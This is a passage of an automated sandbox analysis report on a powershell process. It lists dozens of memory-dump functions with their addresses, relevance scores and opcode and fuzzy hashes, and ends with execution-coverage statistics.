                                                                          • Instruction Fuzzy Hash: E7715A31E00208DFDB14DFA4D884AADBBF2BF88354F148529E402AB7A0CF75AD46DB51
                                                                          Function 00F687A5 Relevance: .2, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cfafdcb0371dbbdcdd6b45ac685280c91071e18df4a48accb44246a025f50316
                                                                          • Instruction ID: 24535498dd7973d643cf2180a46b5588481207ac208c7a71be3cbd1195ebcb41
                                                                          • Opcode Fuzzy Hash: cfafdcb0371dbbdcdd6b45ac685280c91071e18df4a48accb44246a025f50316
                                                                          • Instruction Fuzzy Hash: D961A434E003499FCB15CFA4C554AADBBB2BF45340F154259E402AF366CB38ED8ADB80
                                                                          Function 00F687BA Relevance: .2, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec254d4c72a28436c5bf60a49a21295fa0d0fd9179aa0f0a929b76cf8424d2b9
                                                                          • Instruction ID: afb330d6f58228cc5abca474685d243ce5fa8e1e10a294ccb3d12ac9c77ec6d0
                                                                          • Opcode Fuzzy Hash: ec254d4c72a28436c5bf60a49a21295fa0d0fd9179aa0f0a929b76cf8424d2b9
                                                                          • Instruction Fuzzy Hash: D5615135E002499FCB14DFE4D554AADBBB2BF84340F258259E402AF365DB78ED89DB80
                                                                          Function 00F68C50 Relevance: .2, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1bc403f937a18c8df47f6b15bf6e23753b608ef041991602875a4463b8244809
                                                                          • Instruction ID: 40c10c93e87016a542f8047b3916790919b8297e05f3835567c1a2747c69c4ad
                                                                          • Opcode Fuzzy Hash: 1bc403f937a18c8df47f6b15bf6e23753b608ef041991602875a4463b8244809
                                                                          • Instruction Fuzzy Hash: 4B518E71A002089FDB14DFA9D844AAEBBF6FF89354F108569D405EB7A0DF75AC42CB90
                                                                          Function 00F687C8 Relevance: .2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9bbdf47374316400e6d99aa1499973eacddd33c11fc7ce8025fc662779fc2241
                                                                          • Instruction ID: d6bfd352365216f2000fc96369ffb30fb625cbf1bedd2defdc0c2325bf917487
                                                                          • Opcode Fuzzy Hash: 9bbdf47374316400e6d99aa1499973eacddd33c11fc7ce8025fc662779fc2241
                                                                          • Instruction Fuzzy Hash: 1D614F34E002499FCB14DFE4D554AADBBB2BF88340F158659E402AF365DB78ED89DB80
                                                                          Function 00F68790 Relevance: .1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 23bc9ba7f0b09e6cadc136943a19cf1cd88afa3966ffe123afe03c392712f9db
                                                                          • Instruction ID: ac5f6279f7619c7b553277de9f59f414587cf0f7e4d0a99502fa31b6b1b9c904
                                                                          • Opcode Fuzzy Hash: 23bc9ba7f0b09e6cadc136943a19cf1cd88afa3966ffe123afe03c392712f9db
                                                                          • Instruction Fuzzy Hash: 81518134E002499FCB15CFA4D554AADBBB2BF45340F158259E402AF366DB78ED89DB80
                                                                          Function 00F6B2E4 Relevance: .1, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6a9af1f502ac9484d42efbd70063bb384822afb8aaa7769cb0fd48bda5fa815
                                                                          • Instruction ID: 321f396a5f0176cc0dc063f87368d59d0dc347889114830ef200b9ae5c6a0b9b
                                                                          • Opcode Fuzzy Hash: f6a9af1f502ac9484d42efbd70063bb384822afb8aaa7769cb0fd48bda5fa815
                                                                          • Instruction Fuzzy Hash: 5E415032B002148FDB24DF74C999AAD7BB2EF88754F194468E406EB7A5DF349C81EB50
                                                                          Function 00F68C42 Relevance: .1, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93b591c4361541dc2b97e188807f2e5a14fc367b85deb073ba892f9cb375a321
                                                                          • Instruction ID: e06bdf3bb07085a71adb5eb81b66e049268931cb7778e8db15a835735844d49a
                                                                          • Opcode Fuzzy Hash: 93b591c4361541dc2b97e188807f2e5a14fc367b85deb073ba892f9cb375a321
                                                                          • Instruction Fuzzy Hash: 84416C70E002089FDB14DFA5C8846ADBBF2BF89354F148529D006AB7A0DF74AC46CF91
                                                                          Function 00F6DBC8 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 558e95f9a42708af35c75ebb3afdff3b840c34659365a10c8cf26ee8ef4db652
                                                                          • Instruction ID: dc00f8f63bf1e3a974c7da8075ccab1236e02bffcc95d001a945b82f07808bb5
                                                                          • Opcode Fuzzy Hash: 558e95f9a42708af35c75ebb3afdff3b840c34659365a10c8cf26ee8ef4db652
                                                                          • Instruction Fuzzy Hash: 72311930B002188FCF259B64C9956EEB7B2AF89344F1084E9D509AB351DB359E85DF81
                                                                          Function 00F68DFF Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 385314cc95b4330eecd88484d94083039c2081df9c81bb01261840f7a7d5b997
                                                                          • Instruction ID: 32e195450c245a8d43b7c086912388bd67989bf9acccf245b41cd1970b450142
                                                                          • Opcode Fuzzy Hash: 385314cc95b4330eecd88484d94083039c2081df9c81bb01261840f7a7d5b997
                                                                          • Instruction Fuzzy Hash: 27318E31E001089FCB14DFA4C584AEDB7F7AF89354F24856AE401AB750CF31AD46DB91
                                                                          Function 07212D10 Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 500b41b25900dcb45fcd18405ad45d6dfa78a2c8e90608a6744020da3fb7a03e
                                                                          • Instruction ID: 889798407e8d4045db24dc9d38085f429c7ac66656552da73e0e50c16dcdbb1c
                                                                          • Opcode Fuzzy Hash: 500b41b25900dcb45fcd18405ad45d6dfa78a2c8e90608a6744020da3fb7a03e
                                                                          • Instruction Fuzzy Hash: 08214CB3B14211CBD7249668D80279AB3E2FFD6215B2480BBD5428B741EE72D842C7E1
                                                                          Function 00F68B18 Relevance: .1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6579c5fbb4d8767b379d4a6cfb41bf9d4479a4979aa703703e7273f92c1ffa1
                                                                          • Instruction ID: 2487b884e724c995cd00afae4c7db815f23810a95c7ac2985af06840d7085684
                                                                          • Opcode Fuzzy Hash: a6579c5fbb4d8767b379d4a6cfb41bf9d4479a4979aa703703e7273f92c1ffa1
                                                                          • Instruction Fuzzy Hash: E3315976B002089FCB14DF28D899AAD7BF2AF8C361F140168E506EB7A1CF759C42DB50
                                                                          Function 00F692F0 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca3b6421c26f315aa4b26d83c3525ec29bc3d2fc582c6e1ab5fdb951774575d6
                                                                          • Instruction ID: 033fb99b21fe69661ceb8f00557336406aa545018e3e55dff23a7447dc21e513
                                                                          • Opcode Fuzzy Hash: ca3b6421c26f315aa4b26d83c3525ec29bc3d2fc582c6e1ab5fdb951774575d6
                                                                          • Instruction Fuzzy Hash: 6B212574A04606DFCB04CF49C585EAAF7B9FB88310B248568D909EB751C732EC92CBA0
                                                                          Function 00F631C8 Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5487faed6cd4d6311fb3736c51bfe96d6eddda7bfa3c5fab2670489432c106e
                                                                          • Instruction ID: 9f086cc9896b56f9bca5eb3f4e7682c80755d2586aed2e624d17a6cd2129a17d
                                                                          • Opcode Fuzzy Hash: e5487faed6cd4d6311fb3736c51bfe96d6eddda7bfa3c5fab2670489432c106e
                                                                          • Instruction Fuzzy Hash: 85214F74A042199FCB00CF98D490AAEFBF1FF89310B158596D959EB352C731ED41DBA1
                                                                          Function 00F68320 Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f25cb2e2011ddb674ddfae24ba96ab0abf58088954e1440842a8be266830b94e
                                                                          • Instruction ID: 7ac599dde3bff3b42d3e5d3cddfc07246890a433c738928bb92527b573a66e56
                                                                          • Opcode Fuzzy Hash: f25cb2e2011ddb674ddfae24ba96ab0abf58088954e1440842a8be266830b94e
                                                                          • Instruction Fuzzy Hash: 3911E231204340CFC7269B28D504A957BA5AF86769F0A41EEE00C8B3A3CB76DC4BC791
                                                                          Function 00F631B9 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95a7778a41b219d5a41395015fa35744b6e231e5cf224cef8691962077f5cee4
                                                                          • Instruction ID: 4110d27f4951d8620833f3c79a3e89af8a645c0866d839cb0b366443235fbe51
                                                                          • Opcode Fuzzy Hash: 95a7778a41b219d5a41395015fa35744b6e231e5cf224cef8691962077f5cee4
                                                                          • Instruction Fuzzy Hash: F5212974A042099FCB00DF98D990AAEFBF1FF89310B148599E919EB352C735ED41CBA1
                                                                          Function 07210625 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba34aefa17d949e035942859ec351dc8f52a58aa71e85f1dba9f3ddab1fac6c0
                                                                          • Instruction ID: 1d7fe53dd8893a098bb05d77081a01dd68bb81c685c00ae76c52cde205a581b6
                                                                          • Opcode Fuzzy Hash: ba34aefa17d949e035942859ec351dc8f52a58aa71e85f1dba9f3ddab1fac6c0
                                                                          • Instruction Fuzzy Hash: 5B11E0B5324387CFD7318B14C840A66BBF5FFE2255B1980AFD9048B262D776C881CB20
                                                                          Function 07216336 Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 59e4e30eff333c8311cec87a31c767a1e5ec9067ba122eefa3b34da4ce689144
                                                                          • Instruction ID: d752e022a3ed4f678c028d3387d13a2d05fe1a5361af805365c0e65b91bbca08
                                                                          • Opcode Fuzzy Hash: 59e4e30eff333c8311cec87a31c767a1e5ec9067ba122eefa3b34da4ce689144
                                                                          • Instruction Fuzzy Hash: ED112BB42193829FDB12C760C854AA9BBB1AFD721071DC1DFD0848F193CE72D846C752
                                                                          Function 00F682D0 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eca8eecc7d785a2031f2cb4132a23df89bf3a24974f89465853636ce60ecf5ea
                                                                          • Instruction ID: 4bc3c098ee0e962efb4af5e21f214aa4cd891d6cd740db4a49390d11430d1aef
                                                                          • Opcode Fuzzy Hash: eca8eecc7d785a2031f2cb4132a23df89bf3a24974f89465853636ce60ecf5ea
                                                                          • Instruction Fuzzy Hash: AE01F9316042408FCB128B19C124991BFB4EF867A5B1945DEE144CF353CB35EC47D7A0
                                                                          Function 00EFD01D Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840557052.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_efd000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef26ed4a5256c61af2842eca48657f7dc1b98639b46b78fabdbf0d42a394d2a5
                                                                          • Instruction ID: cec42ee68bef5221a61804c767b4da273d61263f9e3e9dc3991f6f2ce3360482
                                                                          • Opcode Fuzzy Hash: ef26ed4a5256c61af2842eca48657f7dc1b98639b46b78fabdbf0d42a394d2a5
                                                                          • Instruction Fuzzy Hash: 7001263150D348AFE7108E21CD80B77FFDADF41324F18C41AEE086B282CA799941CAB2
                                                                          Function 00F6AABA Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9f449e187dbcc6a7614a748614fd2f47e532ace25024733ddc976500612952a
                                                                          • Instruction ID: 266337ade8432050c4cd2eafa329926ac4135248519a7f2e719f83b328e17901
                                                                          • Opcode Fuzzy Hash: b9f449e187dbcc6a7614a748614fd2f47e532ace25024733ddc976500612952a
                                                                          • Instruction Fuzzy Hash: C401DF31A047408FC724CB65D405B76BBE6DFC5324F08C0BAD4498B251DB39E846DF10
                                                                          Function 07210AAC Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f70cb3c256182953899ec0708f9f1ba31be5e0d21904ab19615af04dab6a97e6
                                                                          • Instruction ID: c193b46bb218bd594ae44bb2b4612c4f33bbafc73f018dca919b7078a5905152
                                                                          • Opcode Fuzzy Hash: f70cb3c256182953899ec0708f9f1ba31be5e0d21904ab19615af04dab6a97e6
                                                                          • Instruction Fuzzy Hash: 290128B0609752EFD3298B14D880626BBF5FF87349736856EC4D5AB201C730AC82C7A4
                                                                          Function 00EFD01C Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840557052.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_efd000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 325a4130643a7412cfd9b63b801e2a36beb10c3c79a89535b8bb746c28cad04c
                                                                          • Instruction ID: 32582e1b662fa82790b2fcd457ff977f05e2063008d67b3b47bdef387676abcb
                                                                          • Opcode Fuzzy Hash: 325a4130643a7412cfd9b63b801e2a36beb10c3c79a89535b8bb746c28cad04c
                                                                          • Instruction Fuzzy Hash: 07F0C272409344AEE7108E16CD84B62FFD9EB41338F18C45AEE481B282C2B99844CAB1
                                                                          Function 00F6810A Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2ffd4b51a1af9057bf9891e48c81b7877890db642b2da1cb0fc596dcfd675c9
                                                                          • Instruction ID: faa8cd2183ed019d509e3aff9c64cd5b34cace88c6125b9f444be94472f9a368
                                                                          • Opcode Fuzzy Hash: c2ffd4b51a1af9057bf9891e48c81b7877890db642b2da1cb0fc596dcfd675c9
                                                                          • Instruction Fuzzy Hash: 3C0119B5E0424A8FC741DFA8D485AAABFF0BF09210F504199E909DB722D730A981CBD1
                                                                          Function 00F68310 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a211d95b623b3519a4b6eeb4d5cbe34c220844721d93ab0978614f29b501b838
                                                                          • Instruction ID: 0337e01e1a3c59e2cf174d91f3e95a3f223a97ecc30532308e5db590d5720c41
                                                                          • Opcode Fuzzy Hash: a211d95b623b3519a4b6eeb4d5cbe34c220844721d93ab0978614f29b501b838
                                                                          • Instruction Fuzzy Hash: 80F08231A04200DFC7248B18D544B55B7E5AF85799F1985ADD408CB761CB75DC47CB40
                                                                          Function 00F62D5E Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d517bd1aa6474d7ab0a6f4cb5e82f12da5dd530681a3bdb9f62c4822c1a7fa83
                                                                          • Instruction ID: ac5c7fe2128ae47b18ed26400cad6ac9f268ec2ff574350eb2a1a42636d03410
                                                                          • Opcode Fuzzy Hash: d517bd1aa6474d7ab0a6f4cb5e82f12da5dd530681a3bdb9f62c4822c1a7fa83
                                                                          • Instruction Fuzzy Hash: CAF0B735A001059FDB15CB98D890AEEF7B1FF88324F208159E515A72A1C736EC52CB50
                                                                          Function 00F68118 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd0a8b9f0b93c94bc9265f12e20cb71303e7bb1247e8e4aec93a82868675fa99
                                                                          • Instruction ID: 99caba4608f0bfb5f5bb49854130297462f3d6a1b31ab6e14a963cfbe56b9ed8
                                                                          • Opcode Fuzzy Hash: fd0a8b9f0b93c94bc9265f12e20cb71303e7bb1247e8e4aec93a82868675fa99
                                                                          • Instruction Fuzzy Hash: 05F0A9B4E0020A8FC780DF68C485AAEBBF1BF49314F504199D509DB321D730A951CBD1
                                                                          Function 072161A4 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ace70d74d7645de65d5615f9b5c8de6352fff2ee5bfe479574a420a10a12d094
                                                                          • Instruction ID: 512510b61e473d765f71c8b9956509e8c29cbfb5c4d4b8c7f9c291b90e89944f
                                                                          • Opcode Fuzzy Hash: ace70d74d7645de65d5615f9b5c8de6352fff2ee5bfe479574a420a10a12d094
                                                                          • Instruction Fuzzy Hash: D1F0A0702193829FD7128B50CC54A50BBB1BB93226F1EC0DAC0088F293DB7AA842C701
                                                                          Function 00F6A748 Relevance: .0, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840705867.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_f60000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85d7d45aaee96ec4bcd4036a72a6ea5ff6a0da88c32aa591ad82ae4da4bd154d
                                                                          • Instruction ID: 214c61a24644269184f9f22242986957c2027cf7c1a7a787bfee90936b12cc89
                                                                          • Opcode Fuzzy Hash: 85d7d45aaee96ec4bcd4036a72a6ea5ff6a0da88c32aa591ad82ae4da4bd154d
                                                                          • Instruction Fuzzy Hash: 77E092313107816FD305E774E495AAA7772EFCA340B054566E606CB245DF78A8528790

                                                                          Non-executed Functions

                                                                          Function 00EFD6E4 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1840557052.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_efd000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9fcc25475b4b202090962ecd8a5a6d335b4a56fb312fc5d11104815a447c783e
                                                                          • Instruction ID: 3b940794a2409e2daa69ff00d5234822e756de99428b4e552e496d3f246d3665
                                                                          • Opcode Fuzzy Hash: 9fcc25475b4b202090962ecd8a5a6d335b4a56fb312fc5d11104815a447c783e
                                                                          • Instruction Fuzzy Hash: C8210871508348DFDB04EF10DDC0B66BF66FB94314F24856AD9095F296C336D856CAA1
                                                                          Function 0721CAA9 Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84l$84l$84l$84l
                                                                          • API String ID: 0-3024328185
                                                                          • Opcode ID: 417afa09b0ee394bd727ec848b41833152aa0c44cb20f0a7e18285b2fae12cc3
                                                                          • Instruction ID: 9519d30376aae1cd44dc4fdaa75eb61ac22d84741bec651acb65b656225a3eb2
                                                                          • Opcode Fuzzy Hash: 417afa09b0ee394bd727ec848b41833152aa0c44cb20f0a7e18285b2fae12cc3
                                                                          • Instruction Fuzzy Hash: 2A61C3B4B60216DFDB24DB94C450BAABBF2BB89710F248559E805AF340CB71DC81CBB1

                                                                          Execution Graph

                                                                          Execution Coverage:8.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:166
                                                                          Total number of Limit Nodes:15
